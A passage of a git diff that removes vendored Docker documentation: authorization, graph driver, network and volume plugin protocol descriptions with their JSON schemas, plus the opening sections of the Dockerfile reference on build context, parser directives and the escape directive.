bodies where -the `Content-Type` is either `text/*` or `application/json` are sent. - -For commands that can potentially hijack the HTTP connection (`HTTP -Upgrade`), such as `exec`, the authorization plugin is only called for the -initial HTTP requests. Once the plugin approves the command, authorization is -not applied to the rest of the flow. Specifically, the streaming data is not -passed to the authorization plugins. For commands that return chunked HTTP -response, such as `logs` and `events`, only the HTTP request is sent to the -authorization plugins. 
- -During request/response processing, some authorization flows might -need to do additional queries to the Docker daemon. To complete such flows, -plugins can call the daemon API similar to a regular user. To enable these -additional queries, the plugin must provide the means for an administrator to -configure proper authentication and security policies. - -## Docker client flows - -To enable and configure the authorization plugin, the plugin developer must -support the Docker client interactions detailed in this section. - -### Setting up Docker daemon - -Enable the authorization plugin with a dedicated command line flag in the -`--authorization-plugin=PLUGIN_ID` format. The flag supplies a `PLUGIN_ID` -value. This value can be the plugin’s socket or a path to a specification file. -Authorization plugins can be loaded without restarting the daemon. Refer -to the [`dockerd` documentation](../reference/commandline/dockerd.md#configuration-reloading) for more information. - -```bash -$ dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... -``` - -Docker's authorization subsystem supports multiple `--authorization-plugin` parameters. - -### Calling authorized command (allow) - -```bash -$ docker pull centos -... -f1b10cd84249: Pull complete -... -``` - -### Calling unauthorized command (deny) - -```bash -$ docker pull centos -... -docker: Error response from daemon: authorization denied by plugin PLUGIN_NAME: volumes are not allowed. -``` - -### Error from plugins - -```bash -$ docker pull centos -... -docker: Error response from daemon: plugin PLUGIN_NAME failed with error: AuthZPlugin.AuthZReq: Cannot connect to the Docker daemon. Is the docker daemon running on this host?. 
-``` - -## API schema and implementation - -In addition to Docker's standard plugin registration method, each plugin -should implement the following two methods: - -* `/AuthZPlugin.AuthZReq` This authorize request method is called before the Docker daemon processes the client request. - -* `/AuthZPlugin.AuthZRes` This authorize response method is called before the response is returned from Docker daemon to the client. - -#### /AuthZPlugin.AuthZReq - -**Request**: - -```json -{ - "User": "The user identification", - "UserAuthNMethod": "The authentication method used", - "RequestMethod": "The HTTP method", - "RequestURI": "The HTTP request URI", - "RequestBody": "Byte array containing the raw HTTP request body", - "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string " -} -``` - -**Response**: - -```json -{ - "Allow": "Determined whether the user is allowed or not", - "Msg": "The authorization message", - "Err": "The error message if things go wrong" -} -``` -#### /AuthZPlugin.AuthZRes - -**Request**: - -```json -{ - "User": "The user identification", - "UserAuthNMethod": "The authentication method used", - "RequestMethod": "The HTTP method", - "RequestURI": "The HTTP request URI", - "RequestBody": "Byte array containing the raw HTTP request body", - "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string", - "ResponseBody": "Byte array containing the raw HTTP response body", - "ResponseHeader": "Byte array containing the raw HTTP response header as a map[string][]string", - "ResponseStatusCode":"Response status code" -} -``` - -**Response**: - -```json -{ - "Allow": "Determined whether the user is allowed or not", - "Msg": "The authorization message", - "Err": "The error message if things go wrong" -} -``` - -### Request authorization - -Each plugin must support two request authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. 
The tables below detail the content expected in each message. - -#### Daemon -> Plugin - -Name | Type | Description ------------------------|-------------------|------------------------------------------------------- -User | string | The user identification -Authentication method | string | The authentication method used -Request method | enum | The HTTP method (GET/DELETE/POST) -Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) -Request headers | map[string]string | Request headers as key value pairs (without the authorization header) -Request body | []byte | Raw request body - - -#### Plugin -> Daemon - -Name | Type | Description ---------|--------|---------------------------------------------------------------------------------- -Allow | bool | Boolean value indicating whether the request is allowed or denied -Msg | string | Authorization message (will be returned to the client in case the access is denied) -Err | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information) - -### Response authorization - -The plugin must support two authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message. 
- -#### Daemon -> Plugin - - -Name | Type | Description ------------------------ |------------------ |---------------------------------------------------- -User | string | The user identification -Authentication method | string | The authentication method used -Request method | string | The HTTP method (GET/DELETE/POST) -Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) -Request headers | map[string]string | Request headers as key value pairs (without the authorization header) -Request body | []byte | Raw request body -Response status code | int | Status code from the docker daemon -Response headers | map[string]string | Response headers as key value pairs -Response body | []byte | Raw docker daemon response body - - -#### Plugin -> Daemon - -Name | Type | Description ---------|--------|---------------------------------------------------------------------------------- -Allow | bool | Boolean value indicating whether the response is allowed or denied -Msg | string | Authorization message (will be returned to the client in case the access is denied) -Err | string | Error message (will be returned to the client in case the plugin encounter an error. 
The string value supplied may appear in logs, so should not include confidential information) diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md deleted file mode 100644 index d91c383b5f..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md +++ /dev/null @@ -1,376 +0,0 @@ ---- -title: "Graphdriver plugins" -description: "How to manage image and container filesystems with external plugins" -keywords: "Examples, Usage, storage, image, docker, data, graph, plugin, api" -advisory: experimental ---- - - - - -## Changelog - -### 1.13.0 - -- Support v2 plugins - -# Docker graph driver plugins - -Docker graph driver plugins enable admins to use an external/out-of-process -graph driver for use with Docker engine. This is an alternative to using the -built-in storage drivers, such as aufs/overlay/devicemapper/btrfs. - -You need to install and enable the plugin and then restart the Docker daemon -before using the plugin. See the following example for the correct ordering -of steps. - -``` -$ docker plugin install cpuguy83/docker-overlay2-graphdriver-plugin # this command also enables the driver - -$ pkill dockerd -$ dockerd --experimental -s cpuguy83/docker-overlay2-graphdriver-plugin -``` - -# Write a graph driver plugin - -See the [plugin documentation](/docs/extend/index.md) for detailed information -on the underlying plugin protocol. - - -## Graph Driver plugin protocol - -If a plugin registers itself as a `GraphDriver` when activated, then it is -expected to provide the rootfs for containers as well as image layer storage. - -### /GraphDriver.Init - -**Request**: -```json -{ - "Home": "/graph/home/path", - "Opts": [], - "UIDMaps": [], - "GIDMaps": [] -} -``` - -Initialize the graph driver plugin with a home directory and array of options. -These are passed through from the user, but the plugin is not required to parse -or honor them. 
-
-The request also includes a list of UID and GID mappings, structured as follows:
-```json
-{
-  "ContainerID": 0,
-  "HostID": 0,
-  "Size": 0
-}
-```
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-
-### /GraphDriver.Create
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
-  "MountLabel": "",
-  "StorageOpt": {}
-}
-```
-
-Create a new, empty, read-only filesystem layer with the specified
-`ID`, `Parent` and `MountLabel`. If `Parent` is an empty string, there is no
-parent layer. `StorageOpt` is a map of strings which indicate storage options.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.CreateReadWrite
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
-  "MountLabel": "",
-  "StorageOpt": {}
-}
-```
-
-Similar to `/GraphDriver.Create` but creates a read-write filesystem layer.
-
-### /GraphDriver.Remove
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Remove the filesystem layer with this given `ID`.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Get
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "MountLabel": ""
-}
-```
-
-Get the mountpoint for the layered filesystem referred to by the given `ID`.
-
-**Response**:
-```json
-{
-  "Dir": "/var/mygraph/46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Err": ""
-}
-```
-
-Respond with the absolute path to the mounted layered filesystem.
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Put
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Release the system resources for the specified `ID`, such as unmounting the
-filesystem layer.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Exists
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Determine if a filesystem layer with the specified `ID` exists.
-
-**Response**:
-```json
-{
-  "Exists": true
-}
-```
-
-Respond with a boolean for whether or not the filesystem layer with the specified
-`ID` exists.
-
-### /GraphDriver.Status
-
-**Request**:
-```json
-{}
-```
-
-Get low-level diagnostic information about the graph driver.
-
-**Response**:
-```json
-{
-  "Status": [[]]
-}
-```
-
-Respond with a 2-D array with key/value pairs for the underlying status
-information.
-
-
-### /GraphDriver.GetMetadata
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Get low-level diagnostic information about the layered filesystem with
-the specified `ID`.
-
-**Response**:
-```json
-{
-  "Metadata": {},
-  "Err": ""
-}
-```
-
-Respond with a set of key/value pairs containing the low-level diagnostic
-information about the layered filesystem.
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Cleanup
-
-**Request**:
-```json
-{}
-```
-
-Perform necessary tasks to release resources held by the plugin, such as
-unmounting all the layered file systems.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
- - -### /GraphDriver.Diff - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" -} -``` - -Get an archive of the changes between the filesystem layers specified by the `ID` -and `Parent`. `Parent` may be an empty string, in which case there is no parent. - -**Response**: -``` -{{ TAR STREAM }} -``` - -### /GraphDriver.Changes - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" -} -``` - -Get a list of changes between the filesystem layers specified by the `ID` and -`Parent`. If `Parent` is an empty string, there is no parent. - -**Response**: -```json -{ - "Changes": [{}], - "Err": "" -} -``` - -Respond with a list of changes. The structure of a change is: -```json - "Path": "/some/path", - "Kind": 0, -``` - -Where the `Path` is the filesystem path within the layered filesystem that is -changed and `Kind` is an integer specifying the type of change that occurred: - -- 0 - Modified -- 1 - Added -- 2 - Deleted - -Respond with a non-empty string error if an error occurred. - -### /GraphDriver.ApplyDiff - -**Request**: -``` -{{ TAR STREAM }} -``` - -Extract the changeset from the given diff into the layer with the specified `ID` -and `Parent` - -**Query Parameters**: - -- id (required)- the `ID` of the new filesystem layer to extract the diff to -- parent (required)- the `Parent` of the given `ID` - -**Response**: -```json -{ - "Size": 512366, - "Err": "" -} -``` - -Respond with the size of the new layer in bytes. -Respond with a non-empty string error if an error occurred. 
- -### /GraphDriver.DiffSize - -**Request**: -```json -{ - "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", - "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" -} -``` - -Calculate the changes between the specified `ID` - -**Response**: -```json -{ - "Size": 512366, - "Err": "" -} -``` - -Respond with the size changes between the specified `ID` and `Parent` -Respond with a non-empty string error if an error occurred. diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_network.md b/vendor/github.com/docker/docker/docs/extend/plugins_network.md deleted file mode 100644 index a974862fa6..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_network.md +++ /dev/null @@ -1,77 +0,0 @@ ---- -title: "Docker network driver plugins" -description: "Network driver plugins." -keywords: "Examples, Usage, plugins, docker, documentation, user guide" ---- - - - -# Engine network driver plugins - -This document describes Docker Engine network driver plugins generally -available in Docker Engine. To view information on plugins -managed by Docker Engine, refer to [Docker Engine plugin system](index.md). - -Docker Engine network plugins enable Engine deployments to be extended to -support a wide range of networking technologies, such as VXLAN, IPVLAN, MACVLAN -or something completely different. Network driver plugins are supported via the -LibNetwork project. Each plugin is implemented as a "remote driver" for -LibNetwork, which shares plugin infrastructure with Engine. Effectively, network -driver plugins are activated in the same way as other plugins, and use the same -kind of protocol. - -## Network driver plugins and swarm mode - -Docker 1.12 adds support for cluster management and orchestration called -[swarm mode](https://docs.docker.com/engine/swarm/). Docker Engine running in swarm mode currently -only supports the built-in overlay driver for networking. 
Therefore existing -networking plugins will not work in swarm mode. - -When you run Docker Engine outside of swarm mode, all networking plugins that -worked in Docker 1.11 will continue to function normally. They do not require -any modification. - -## Using network driver plugins - -The means of installing and running a network driver plugin depend on the -particular plugin. So, be sure to install your plugin according to the -instructions obtained from the plugin developer. - -Once running however, network driver plugins are used just like the built-in -network drivers: by being mentioned as a driver in network-oriented Docker -commands. For example, - - $ docker network create --driver weave mynet - -Some network driver plugins are listed in [plugins](legacy_plugins.md) - -The `mynet` network is now owned by `weave`, so subsequent commands -referring to that network will be sent to the plugin, - - $ docker run --network=mynet busybox top - - -## Write a network plugin - -Network plugins implement the [Docker plugin -API](plugin_api.md) and the network plugin protocol - -## Network plugin protocol - -The network driver protocol, in addition to the plugin activation call, is -documented as part of libnetwork: -[https://github.com/docker/libnetwork/blob/master/docs/remote.md](https://github.com/docker/libnetwork/blob/master/docs/remote.md). - -# Related Information - -To interact with the Docker maintainers and other interested users, see the IRC channel `#docker-network`. 
- -- [Docker networks feature overview](https://docs.docker.com/engine/userguide/networking/) -- The [LibNetwork](https://github.com/docker/libnetwork) project diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md deleted file mode 100644 index c060bf39b1..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md +++ /dev/null @@ -1,276 +0,0 @@ ---- -title: "Volume plugins" -description: "How to manage data with external volume plugins" -keywords: "Examples, Usage, volume, docker, data, volumes, plugin, api" ---- - - - -# Write a volume plugin - -Docker Engine volume plugins enable Engine deployments to be integrated with -external storage systems, such as Amazon EBS, and enable data volumes to persist -beyond the lifetime of a single Engine host. See the -[plugin documentation](legacy_plugins.md) for more information. - -## Changelog - -### 1.13.0 - -- If used as part of the v2 plugin architecture, mountpoints that are part of paths returned by plugin have to be mounted under the directory specified by PropagatedMount in the plugin configuration [#26398](https://github.com/docker/docker/pull/26398) - -### 1.12.0 - -- Add `Status` field to `VolumeDriver.Get` response ([#21006](https://github.com/docker/docker/pull/21006#)) -- Add `VolumeDriver.Capabilities` to get capabilities of the volume driver([#22077](https://github.com/docker/docker/pull/22077)) - -### 1.10.0 - -- Add `VolumeDriver.Get` which gets the details about the volume ([#16534](https://github.com/docker/docker/pull/16534)) -- Add `VolumeDriver.List` which lists all volumes owned by the driver ([#16534](https://github.com/docker/docker/pull/16534)) - -### 1.8.0 - -- Initial support for volume driver plugins ([#14659](https://github.com/docker/docker/pull/14659)) - -## Command-line changes - -A volume plugin makes use of the `-v`and `--volume-driver` flag on the `docker run` command. 
The `-v` flag accepts a volume name and the `--volume-driver` flag a driver type, for example:
-
-    $ docker run -ti -v volumename:/data --volume-driver=flocker busybox sh
-
-This command passes the `volumename` through to the volume plugin as a
-user-given name for the volume. The `volumename` must not begin with a `/`.
-
-By having the user specify a `volumename`, a plugin can associate the volume
-with an external volume beyond the lifetime of a single container or container
-host. This can be used, for example, to move a stateful container from one
-server to another.
-
-By specifying a `volumedriver` in conjunction with a `volumename`, users can use plugins such as [Flocker](https://clusterhq.com/docker-plugin/) to manage volumes external to a single host, such as those on EBS.
-
-
-## Create a VolumeDriver
-
-The container creation endpoint (`/containers/create`) accepts a `VolumeDriver`
-field of type `string` allowing you to specify the name of the driver. Its default
-value is `"local"` (the default driver for local volumes).
-
-## Volume plugin protocol
-
-If a plugin registers itself as a `VolumeDriver` when activated, then it is
-expected to provide writeable paths on the host filesystem for the Docker
-daemon to provide to containers to consume.
-
-The Docker daemon handles bind-mounting the provided paths into user
-containers.
-
-> **Note**: Volume plugins should *not* write data to the `/var/lib/docker/`
-> directory, including `/var/lib/docker/volumes`. The `/var/lib/docker/`
-> directory is reserved for Docker.
-
-### /VolumeDriver.Create
-
-**Request**:
-```json
-{
-  "Name": "volume_name",
-  "Opts": {}
-}
-```
-
-Instruct the plugin that the user wants to create a volume, given a user
-specified volume name. The plugin does not need to actually manifest the
-volume on the filesystem yet (until Mount is called).
-Opts is a map of driver specific options passed through from the user request.
- -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a string error if an error occurred. - -### /VolumeDriver.Remove - -**Request**: -```json -{ - "Name": "volume_name" -} -``` - -Delete the specified volume from disk. This request is issued when a user invokes `docker rm -v` to remove volumes associated with a container. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a string error if an error occurred. - -### /VolumeDriver.Mount - -**Request**: -```json -{ - "Name": "volume_name", - "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" -} -``` - -Docker requires the plugin to provide a volume, given a user specified volume -name. This is called once per container start. If the same volume_name is requested -more than once, the plugin may need to keep track of each new mount request and provision -at the first mount request and deprovision at the last corresponding unmount request. - -`ID` is a unique ID for the caller that is requesting the mount. - -**Response**: -```json -{ - "Mountpoint": "/path/to/directory/on/host", - "Err": "" -} -``` - -Respond with the path on the host filesystem where the volume has been made -available, and/or a string error if an error occurred. - -### /VolumeDriver.Path - -**Request**: -```json -{ - "Name": "volume_name" -} -``` - -Docker needs reminding of the path to the volume on the host. - -**Response**: -```json -{ - "Mountpoint": "/path/to/directory/on/host", - "Err": "" -} -``` - -Respond with the path on the host filesystem where the volume has been made -available, and/or a string error if an error occurred. `Mountpoint` is optional, -however the plugin may be queried again later if one is not provided. - -### /VolumeDriver.Unmount - -**Request**: -```json -{ - "Name": "volume_name", - "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" -} -``` - -Indication that Docker no longer is using the named volume. This is called once -per container stop. 
Plugin may deduce that it is safe to deprovision it at -this point. - -`ID` is a unique ID for the caller that is requesting the mount. - -**Response**: -```json -{ - "Err": "" -} -``` - -Respond with a string error if an error occurred. - - -### /VolumeDriver.Get - -**Request**: -```json -{ - "Name": "volume_name" -} -``` - -Get the volume info. - - -**Response**: -```json -{ - "Volume": { - "Name": "volume_name", - "Mountpoint": "/path/to/directory/on/host", - "Status": {} - }, - "Err": "" -} -``` - -Respond with a string error if an error occurred. `Mountpoint` and `Status` are -optional. - - -### /VolumeDriver.List - -**Request**: -```json -{} -``` - -Get the list of volumes registered with the plugin. - -**Response**: -```json -{ - "Volumes": [ - { - "Name": "volume_name", - "Mountpoint": "/path/to/directory/on/host" - } - ], - "Err": "" -} -``` - -Respond with a string error if an error occurred. `Mountpoint` is optional. - -### /VolumeDriver.Capabilities - -**Request**: -```json -{} -``` - -Get the list of capabilities the driver supports. -The driver is not required to implement this endpoint, however in such cases -the default values will be taken. - -**Response**: -```json -{ - "Capabilities": { - "Scope": "global" - } -} -``` - -Supported scopes are `global` and `local`. Any other value in `Scope` will be -ignored and assumed to be `local`. Scope allows cluster managers to handle the -volume differently, for instance with a scope of `global`, the cluster manager -knows it only needs to create the volume once instead of on every engine. More -capabilities may be added in the future. 
diff --git a/vendor/github.com/docker/docker/docs/reference/builder.md b/vendor/github.com/docker/docker/docs/reference/builder.md deleted file mode 100644 index 6fa5a24150..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/builder.md +++ /dev/null @@ -1,1746 +0,0 @@ ---- -title: "Dockerfile reference" -description: "Dockerfiles use a simple DSL which allows you to automate the steps you would normally manually take to create an image." -keywords: "builder, docker, Dockerfile, automation, image creation" ---- - - - -# Dockerfile reference - -Docker can build images automatically by reading the instructions from a -`Dockerfile`. A `Dockerfile` is a text document that contains all the commands a -user could call on the command line to assemble an image. Using `docker build` -users can create an automated build that executes several command-line -instructions in succession. - -This page describes the commands you can use in a `Dockerfile`. When you are -done reading this page, refer to the [`Dockerfile` Best -Practices](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/) for a tip-oriented guide. - -## Usage - -The [`docker build`](commandline/build.md) command builds an image from -a `Dockerfile` and a *context*. The build's context is the files at a specified -location `PATH` or `URL`. The `PATH` is a directory on your local filesystem. -The `URL` is a Git repository location. - -A context is processed recursively. So, a `PATH` includes any subdirectories and -the `URL` includes the repository and its submodules. A simple build command -that uses the current directory as context: - - $ docker build . - Sending build context to Docker daemon 6.51 MB - ... - -The build is run by the Docker daemon, not by the CLI. The first thing a build -process does is send the entire context (recursively) to the daemon. In most -cases, it's best to start with an empty directory as context and keep your -Dockerfile in that directory. 
Add only the files needed for building the -Dockerfile. - ->**Warning**: Do not use your root directory, `/`, as the `PATH` as it causes ->the build to transfer the entire contents of your hard drive to the Docker ->daemon. - -To use a file in the build context, the `Dockerfile` refers to the file specified -in an instruction, for example, a `COPY` instruction. To increase the build's -performance, exclude files and directories by adding a `.dockerignore` file to -the context directory. For information about how to [create a `.dockerignore` -file](#dockerignore-file) see the documentation on this page. - -Traditionally, the `Dockerfile` is called `Dockerfile` and located in the root -of the context. You use the `-f` flag with `docker build` to point to a Dockerfile -anywhere in your file system. - - $ docker build -f /path/to/a/Dockerfile . - -You can specify a repository and tag at which to save the new image if -the build succeeds: - - $ docker build -t shykes/myapp . - -To tag the image into multiple repositories after the build, -add multiple `-t` parameters when you run the `build` command: - - $ docker build -t shykes/myapp:1.0.2 -t shykes/myapp:latest . - -Before the Docker daemon runs the instructions in the `Dockerfile`, it performs -a preliminary validation of the `Dockerfile` and returns an error if the syntax is incorrect: - - $ docker build -t test/myapp . - Sending build context to Docker daemon 2.048 kB - Error response from daemon: Unknown instruction: RUNCMD - -The Docker daemon runs the instructions in the `Dockerfile` one-by-one, -committing the result of each instruction -to a new image if necessary, before finally outputting the ID of your -new image. The Docker daemon will automatically clean up the context you -sent. - -Note that each instruction is run independently, and causes a new image -to be created - so `RUN cd /tmp` will not have any effect on the next -instructions. 
- -Whenever possible, Docker will re-use the intermediate images (cache), -to accelerate the `docker build` process significantly. This is indicated by -the `Using cache` message in the console output. -(For more information, see the [Build cache section](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache)) in the -`Dockerfile` best practices guide: - - $ docker build -t svendowideit/ambassador . - Sending build context to Docker daemon 15.36 kB - Step 1/4 : FROM alpine:3.2 - ---> 31f630c65071 - Step 2/4 : MAINTAINER SvenDowideit@home.org.au - ---> Using cache - ---> 2a1c91448f5f - Step 3/4 : RUN apk update && apk add socat && rm -r /var/cache/ - ---> Using cache - ---> 21ed6e7fbb73 - Step 4/4 : CMD env | grep _TCP= | (sed 's/.*_PORT_\([0-9]*\)_TCP=tcp:\/\/\(.*\):\(.*\)/socat -t 100000000 TCP4-LISTEN:\1,fork,reuseaddr TCP4:\2:\3 \&/' && echo wait) | sh - ---> Using cache - ---> 7ea8aef582cc - Successfully built 7ea8aef582cc - -Build cache is only used from images that have a local parent chain. This means -that these images were created by previous builds or the whole chain of images -was loaded with `docker load`. If you wish to use build cache of a specific -image you can specify it with `--cache-from` option. Images specified with -`--cache-from` do not need to have a parent chain and may be pulled from other -registries. - -When you're done with your build, you're ready to look into [*Pushing a -repository to its registry*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). - -## Format - -Here is the format of the `Dockerfile`: - -```Dockerfile -# Comment -INSTRUCTION arguments -``` - -The instruction is not case-sensitive. However, convention is for them to -be UPPERCASE to distinguish them from arguments more easily. - - -Docker runs instructions in a `Dockerfile` in order. 
**The first -instruction must be \`FROM\`** in order to specify the [*Base -Image*](glossary.md#base-image) from which you are building. - -Docker treats lines that *begin* with `#` as a comment, unless the line is -a valid [parser directive](#parser-directives). A `#` marker anywhere -else in a line is treated as an argument. This allows statements like: - -```Dockerfile -# Comment -RUN echo 'we are running some # of cool things' -``` - -Line continuation characters are not supported in comments. - -## Parser directives - -Parser directives are optional, and affect the way in which subsequent lines -in a `Dockerfile` are handled. Parser directives do not add layers to the build, -and will not be shown as a build step. Parser directives are written as a -special type of comment in the form `# directive=value`. A single directive -may only be used once. - -Once a comment, empty line or builder instruction has been processed, Docker -no longer looks for parser directives. Instead it treats anything formatted -as a parser directive as a comment and does not attempt to validate if it might -be a parser directive. Therefore, all parser directives must be at the very -top of a `Dockerfile`. - -Parser directives are not case-sensitive. However, convention is for them to -be lowercase. Convention is also to include a blank line following any -parser directives. Line continuation characters are not supported in parser -directives. 
- -Due to these rules, the following examples are all invalid: - -Invalid due to line continuation: - -```Dockerfile -# direc \ -tive=value -``` - -Invalid due to appearing twice: - -```Dockerfile -# directive=value1 -# directive=value2 - -FROM ImageName -``` - -Treated as a comment due to appearing after a builder instruction: - -```Dockerfile -FROM ImageName -# directive=value -``` - -Treated as a comment due to appearing after a comment which is not a parser -directive: - -```Dockerfile -# About my dockerfile -FROM ImageName -# directive=value -``` - -The unknown directive is treated as a comment due to not being recognized. In -addition, the known directive is treated as a comment due to appearing after -a comment which is not a parser directive. - -```Dockerfile -# unknowndirective=value -# knowndirective=value -``` - -Non line-breaking whitespace is permitted in a parser directive. Hence, the -following lines are all treated identically: - -```Dockerfile -#directive=value -# directive =value -# directive= value -# directive = value -# dIrEcTiVe=value -``` - -The following parser directive is supported: - -* `escape` - -## escape - - # escape=\ (backslash) - -Or - - # escape=` (backtick) - -The `escape` directive sets the character used to escape characters in a -`Dockerfile`. If not specified, the default escape character is `\`. - -The escape character is used both to escape characters in a line, and to -escape a newline. This allows a `Dockerfile` instruction to -span multiple lines. Note that regardless of whether the `escape` parser -directive is included in a `Dockerfile`, *escaping is not performed in -a `RUN` command, except at the end of a line.* - -Setting the escape character to `` ` `` is especially useful on -`Windows`, where `\` is the directory path separator. `` ` `` is consistent -with [Windows PowerShell](https://technet.microsoft.com/en-us/library/hh847755.aspx). 
- -Consider the following example which would fail in a non-obvious way on -`Windows`. The second `\` at the end of the second line would be interpreted as an -escape for the newline, instead of a target of the escape from the first `\`. -Similarly, the `\` at the end of the third line would, assuming it was actually -handled as an instruction, cause it be treated as a line continuation. The result -of this dockerfile is that second and third lines are considered a single -instruction: - -```Dockerfile -FROM microsoft/nanoserver -COPY testfile.txt c:\\ -RUN dir c:\ -``` - -Results in: - - PS C:\John> docker build -t cmd . - Sending build context to Docker daemon 3.072 kB - Step 1/2 : FROM microsoft/nanoserver - ---> 22738ff49c6d - Step 2/2 : COPY testfile.txt c:\RUN dir c: - GetFileAttributesEx c:RUN: The system cannot find the file specified. - PS C:\John> - -One solution to the above would be to use `/` as the target of both the `COPY` -instruction, and `dir`. However, this syntax is, at best, confusing as it is not -natural for paths on `Windows`, and at worst, error prone as not all commands on -`Windows` support `/` as the path separator. - -By adding the `escape` parser directive, the following `Dockerfile` succeeds as -expected with the use of natural platform semantics for file paths on `Windows`: - - # escape=` - - FROM microsoft/nanoserver - COPY testfile.txt c:\ - RUN dir c:\ - -Results in: - - PS C:\John> docker build -t succeeds --no-cache=true . - Sending build context to Docker daemon 3.072 kB - Step 1/3 : FROM microsoft/nanoserver - ---> 22738ff49c6d - Step 2/3 : COPY testfile.txt c:\ - ---> 96655de338de - Removing intermediate container 4db9acbb1682 - Step 3/3 : RUN dir c:\ - ---> Running in a2c157f842f5 - Volume in drive C has no label. - Volume Serial Number is 7E6D-E0F7 - - Directory of c:\ - - 10/05/2016 05:04 PM 1,894 License.txt - 10/05/2016 02:22 PM

Program Files - 10/05/2016 02:14 PM Program Files (x86) - 10/28/2016 11:18 AM 62 testfile.txt - 10/28/2016 11:20 AM Users - 10/28/2016 11:20 AM Windows - 2 File(s) 1,956 bytes - 4 Dir(s) 21,259,096,064 bytes free - ---> 01c7f3bef04f - Removing intermediate container a2c157f842f5 - Successfully built 01c7f3bef04f - PS C:\John> - -## Environment replacement - -Environment variables (declared with [the `ENV` statement](#env)) can also be -used in certain instructions as variables to be interpreted by the -`Dockerfile`. Escapes are also handled for including variable-like syntax -into a statement literally. - -Environment variables are notated in the `Dockerfile` either with -`$variable_name` or `${variable_name}`. They are treated equivalently and the -brace syntax is typically used to address issues with variable names with no -whitespace, like `${foo}_bar`. - -The `${variable_name}` syntax also supports a few of the standard `bash` -modifiers as specified below: - -* `${variable:-word}` indicates that if `variable` is set then the result - will be that value. If `variable` is not set then `word` will be the result. -* `${variable:+word}` indicates that if `variable` is set then `word` will be - the result, otherwise the result is the empty string. - -In all cases, `word` can be any string, including additional environment -variables. - -Escaping is possible by adding a `\` before the variable: `\$foo` or `\${foo}`, -for example, will translate to `$foo` and `${foo}` literals respectively. - -Example (parsed representation is displayed after the `#`): - - FROM busybox - ENV foo /bar - WORKDIR ${foo} # WORKDIR /bar - ADD . $foo # ADD . 
